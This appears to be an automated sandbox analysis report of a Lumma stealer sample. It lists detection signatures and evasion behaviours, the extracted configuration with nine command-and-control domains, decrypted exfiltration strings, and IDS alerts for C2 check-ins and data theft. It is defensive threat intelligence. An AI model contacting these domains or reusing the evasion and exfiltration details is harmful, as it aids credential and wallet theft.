Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x6VtGfW26X.exe

Overview

General Information

Sample name:x6VtGfW26X.exe
renamed because original name is a hash value
Original sample name:c17d20e6be092651357a8b466257b795.exe
Analysis ID:1582690
MD5:c17d20e6be092651357a8b466257b795
SHA1:042cc7fc9e7a36bf4989b6be834b0d0d95557c89
SHA256:c35fd8893480f059a48cabc6fc0a956106f55ec96d3fa728fab1bdb4b57c1705
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • x6VtGfW26X.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\x6VtGfW26X.exe" MD5: C17D20E6BE092651357A8B466257B795)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wholersorie.shop", "noisycuttej.shop", "fancywaxxers.shop", "framekgirus.shop", "cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: x6VtGfW26X.exe PID: 6940JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: x6VtGfW26X.exe PID: 6940JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:02.644820+010020283713Unknown Traffic192.168.2.449730104.21.112.1443TCP
            2024-12-31T09:43:03.623054+010020283713Unknown Traffic192.168.2.449731104.21.112.1443TCP
            2024-12-31T09:43:04.830639+010020283713Unknown Traffic192.168.2.449732104.21.112.1443TCP
            2024-12-31T09:43:06.073842+010020283713Unknown Traffic192.168.2.449733104.21.112.1443TCP
            2024-12-31T09:43:07.598382+010020283713Unknown Traffic192.168.2.449734104.21.112.1443TCP
            2024-12-31T09:43:09.153886+010020283713Unknown Traffic192.168.2.449735104.21.112.1443TCP
            2024-12-31T09:43:10.488984+010020283713Unknown Traffic192.168.2.449736104.21.112.1443TCP
            2024-12-31T09:43:14.085649+010020283713Unknown Traffic192.168.2.449737104.21.112.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:03.125539+010020546531A Network Trojan was detected192.168.2.449730104.21.112.1443TCP
            2024-12-31T09:43:04.093969+010020546531A Network Trojan was detected192.168.2.449731104.21.112.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:03.125539+010020498361A Network Trojan was detected192.168.2.449730104.21.112.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:04.093969+010020498121A Network Trojan was detected192.168.2.449731104.21.112.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:02.644820+010020586571Domain Observed Used for C2 Detected192.168.2.449730104.21.112.1443TCP
            2024-12-31T09:43:03.623054+010020586571Domain Observed Used for C2 Detected192.168.2.449731104.21.112.1443TCP
            2024-12-31T09:43:04.830639+010020586571Domain Observed Used for C2 Detected192.168.2.449732104.21.112.1443TCP
            2024-12-31T09:43:06.073842+010020586571Domain Observed Used for C2 Detected192.168.2.449733104.21.112.1443TCP
            2024-12-31T09:43:07.598382+010020586571Domain Observed Used for C2 Detected192.168.2.449734104.21.112.1443TCP
            2024-12-31T09:43:09.153886+010020586571Domain Observed Used for C2 Detected192.168.2.449735104.21.112.1443TCP
            2024-12-31T09:43:10.488984+010020586571Domain Observed Used for C2 Detected192.168.2.449736104.21.112.1443TCP
            2024-12-31T09:43:14.085649+010020586571Domain Observed Used for C2 Detected192.168.2.449737104.21.112.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:02.129169+010020586561Domain Observed Used for C2 Detected192.168.2.4502881.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-31T09:43:09.582681+010020480941Malware Command and Control Activity Detected192.168.2.449735104.21.112.1443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: x6VtGfW26X.exeAvira: detected
            Antivirus detection for URL or domain
            Source: fancywaxxers.shopAvira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop/Avira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop/apiAvira URL Cloud: Label: malware
            Found malware configuration
            Source: x6VtGfW26X.exe.6940.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "noisycuttej.shop", "fancywaxxers.shop", "framekgirus.shop", "cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop"], "Build id": "PsFKDg--pablo"}
            Multi AV Scanner detection for submitted file
            Source: x6VtGfW26X.exeVirustotal: Detection: 58%Perma Link
            Source: x6VtGfW26X.exeReversingLabs: Detection: 65%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: x6VtGfW26X.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cloudewahsj.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rabidcowse.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: noisycuttej.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: tirepublicerj.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: framekgirus.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: wholersorie.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: abruptyopsn.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: nearycrepso.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fancywaxxers.shop
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C9362 CryptUnprotectData,0_2_007C9362
            Source: x6VtGfW26X.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]0_2_007D6000
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]0_2_007BC22D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah0_2_007F0480
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov esi, edx0_2_007B8640
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov dword ptr [esp], ecx0_2_007C9362
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h0_2_007EFB80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]0_2_007EDCE9
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_007EDCE9
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [esi], dl0_2_007BDE48
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], al0_2_007DBE8A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]0_2_007DBE8A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h0_2_007DA050
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]0_2_007EE051
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], dl0_2_007DC0CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh0_2_007C6148
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]0_2_007C6148
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007C6148
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007C6148
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], dl0_2_007DC140
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h0_2_007F0130
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D8100
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]0_2_007EC1B0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], dl0_2_007DC1A3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_007EE19A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], al0_2_007DC26C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]0_2_007DC26C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]0_2_007EE262
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], al0_2_007DC282
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]0_2_007DC282
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]0_2_007D6360
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D6360
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D6340
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]0_2_007D6340
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]0_2_007CC3CC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_007D238D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then jmp ecx0_2_007D238D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov edx, eax0_2_007EC440
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov esi, ecx0_2_007EC510
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then test eax, eax0_2_007EC510
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h0_2_007EC510
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]0_2_007BC6F0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]0_2_007EE6E0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [edi], dx0_2_007C4777
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_007C8740
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]0_2_007EE850
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, word ptr [eax]0_2_007D4974
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_007D4974
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [edi], cx0_2_007D895A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov ecx, eax0_2_007D895A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then jmp ecx0_2_007D29CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D29CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [edi], ax0_2_007CCA60
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [edi], ax0_2_007CCA60
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]0_2_007EEA80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_007B2B60
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then push esi0_2_007D0BD3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]0_2_007C6C90
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]0_2_007C6C90
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]0_2_007C4DC0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov ecx, eax0_2_007CAD80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_007B8EF0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_007CCECA
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]0_2_007D4F91
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_007D4F91
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007C6F8D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov edx, ecx0_2_007C6F8D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [esi], cx0_2_007C6F8D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF0CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh0_2_007E90A0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF1B0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF2F8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF330
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then test eax, eax0_2_007E93D0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]0_2_007B73C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_007B73C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF3C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF450
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_007E5410
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h0_2_007D74A5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]0_2_007C55DB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]0_2_007D37D0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]0_2_007EF830
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h0_2_007C9820
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_007C9820
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then jmp ecx0_2_007ED818
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h0_2_007E98A0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]0_2_007C5882
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h0_2_007C5882
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007BB9F1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]0_2_007D6360
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D6360
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007DBA79
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]0_2_007D3A60
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_007D9A90
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]0_2_007E9C70
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]0_2_007D7CB0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D7CB0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]0_2_007D1C80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov edi, eax0_2_007CBD6D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h0_2_007EFE20
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_007CDE90
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then push eax0_2_007BBF40
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]0_2_007C7FE1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]0_2_007C7FE1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007CBFCA
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]0_2_007EDFB3

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:50288 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.112.1:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: wholersorie.shop
            Source: Malware configuration extractorURLs: noisycuttej.shop
            Source: Malware configuration extractorURLs: fancywaxxers.shop
            Source: Malware configuration extractorURLs: framekgirus.shop
            Source: Malware configuration extractorURLs: cloudewahsj.shop
            Source: Malware configuration extractorURLs: abruptyopsn.shop
            Source: Malware configuration extractorURLs: nearycrepso.shop
            Source: Malware configuration extractorURLs: tirepublicerj.shop
            Source: Malware configuration extractorURLs: rabidcowse.shop
            Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.112.1:443
